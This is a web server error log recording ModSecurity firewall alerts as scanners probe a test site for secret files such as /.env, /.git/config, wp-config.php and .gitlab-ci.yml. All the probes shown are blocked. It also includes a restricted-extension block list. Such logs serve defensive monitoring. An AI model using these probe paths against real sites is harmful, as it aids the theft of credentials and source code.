[Mon Nov 10 05:50:07.493997 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRFu_-fliQcntp9nrypyzwAAAAU"]
[Mon Nov 10 05:50:07.494441 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRFu_-fliQcntp9nrypyzwAAAAU"]
[Mon Nov 10 05:50:07.494638 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRFu_-fliQcntp9nrypyzwAAAAU"]
[Mon Nov 10 05:50:08.058811 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRFvAOfliQcntp9nrypy0AAAAAU"]
[Mon Nov 10 05:50:08.059206 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRFvAOfliQcntp9nrypy0AAAAAU"]
[Mon Nov 10 05:50:08.059420 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRFvAOfliQcntp9nrypy0AAAAAU"]
[Mon Nov 10 05:50:08.947150 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRFvAOfliQcntp9nrypy0QAAAAU"]
[Mon Nov 10 05:50:08.947336 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRFvAOfliQcntp9nrypy0QAAAAU"]
[Mon Nov 10 05:50:08.947715 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRFvAOfliQcntp9nrypy0QAAAAU"]
[Mon Nov 10 05:50:08.947930 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRFvAOfliQcntp9nrypy0QAAAAU"]
[Mon Nov 10 05:50:09.596417 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRFvAefliQcntp9nrypy0gAAAAU"]
[Mon Nov 10 05:50:09.596802 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRFvAefliQcntp9nrypy0gAAAAU"]
[Mon Nov 10 05:50:09.596999 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRFvAefliQcntp9nrypy0gAAAAU"]
[Mon Nov 10 05:50:09.983138 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRFvAefliQcntp9nrypy0wAAAAU"]
[Mon Nov 10 05:50:09.983611 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRFvAefliQcntp9nrypy0wAAAAU"]
[Mon Nov 10 05:50:09.983854 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRFvAefliQcntp9nrypy0wAAAAU"]
[Mon Nov 10 05:50:10.619952 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRFvAufliQcntp9nrypy1AAAAAU"]
[Mon Nov 10 05:50:10.620343 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRFvAufliQcntp9nrypy1AAAAAU"]
[Mon Nov 10 05:50:10.620530 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRFvAufliQcntp9nrypy1AAAAAU"]
[Mon Nov 10 07:10:55.542435 2025] [:error] [pid 4148291] [client 195.178.110.223:54164] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGB74No28sAq1BGyvWMQAAAAAg"]
[Mon Nov 10 07:10:55.542711 2025] [:error] [pid 4148291] [client 195.178.110.223:54164] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGB74No28sAq1BGyvWMQAAAAAg"]
[Mon Nov 10 07:10:55.542870 2025] [:error] [pid 4148291] [client 195.178.110.223:54164] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGB74No28sAq1BGyvWMQAAAAAg"]
[Mon Nov 10 09:22:18.310357 2025] [:error] [pid 4146497] [client 213.209.157.81:46084] [client 213.209.157.81] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGgumk_ZOxM2RQC8XBh2QAAAAY"]
[Mon Nov 10 09:22:18.310646 2025] [:error] [pid 4146497] [client 213.209.157.81:46084] [client 213.209.157.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGgumk_ZOxM2RQC8XBh2QAAAAY"]
[Mon Nov 10 09:22:18.310804 2025] [:error] [pid 4146497] [client 213.209.157.81:46084] [client 213.209.157.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRGgumk_ZOxM2RQC8XBh2QAAAAY"]
[Mon Nov 10 10:53:59.209253 2025] [:error] [pid 4146498] [client 98.86.225.183:46866] [client 98.86.225.183] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRG2N39BDuFoT-Me1hI_NgAAAAc"]
[Mon Nov 10 10:53:59.209575 2025] [:error] [pid 4146498] [client 98.86.225.183:46866] [client 98.86.225.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRG2N39BDuFoT-Me1hI_NgAAAAc"]
[Mon Nov 10 10:53:59.209754 2025] [:error] [pid 4146498] [client 98.86.225.183:46866] [client 98.86.225.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRG2N39BDuFoT-Me1hI_NgAAAAc"]
[Mon Nov 10 13:25:48.562806 2025] [:error] [pid 4146483] [client 204.76.203.25:52002] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHZzDpnbFjtMU_AVy8HkAAAAAQ"]
[Mon Nov 10 13:25:48.563099 2025] [:error] [pid 4146483] [client 204.76.203.25:52002] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHZzDpnbFjtMU_AVy8HkAAAAAQ"]
[Mon Nov 10 13:25:48.563269 2025] [:error] [pid 4146483] [client 204.76.203.25:52002] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHZzDpnbFjtMU_AVy8HkAAAAAQ"]
[Mon Nov 10 13:48:42.770777 2025] [authz_core:error] [pid 4146497] [client 138.68.82.23:35144] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 10 13:48:44.510117 2025] [:error] [pid 4148291] [client 138.68.82.23:35170] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHfLINo28sAq1BGyvWMhAAAAAg"]
[Mon Nov 10 13:48:44.510386 2025] [:error] [pid 4148291] [client 138.68.82.23:35170] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHfLINo28sAq1BGyvWMhAAAAAg"]
[Mon Nov 10 13:48:44.510561 2025] [:error] [pid 4148291] [client 138.68.82.23:35170] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHfLINo28sAq1BGyvWMhAAAAAg"]
[Mon Nov 10 13:48:44.896440 2025] [:error] [pid 4149033] [client 138.68.82.23:35174] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHfLBNXoYsb0162Aih6bgAAAAo"]
[Mon Nov 10 13:48:44.896683 2025] [:error] [pid 4149033] [client 138.68.82.23:35174] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHfLBNXoYsb0162Aih6bgAAAAo"]
[Mon Nov 10 13:48:44.896859 2025] [:error] [pid 4149033] [client 138.68.82.23:35174] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHfLBNXoYsb0162Aih6bgAAAAo"]
[Mon Nov 10 13:48:45.282904 2025] [:error] [pid 4146479] [client 138.68.82.23:35178] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHfLVLv7wBhdUY6uO0c8AAAAAA"]
[Mon Nov 10 13:48:45.283136 2025] [:error] [pid 4146479] [client 138.68.82.23:35178] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHfLVLv7wBhdUY6uO0c8AAAAAA"]
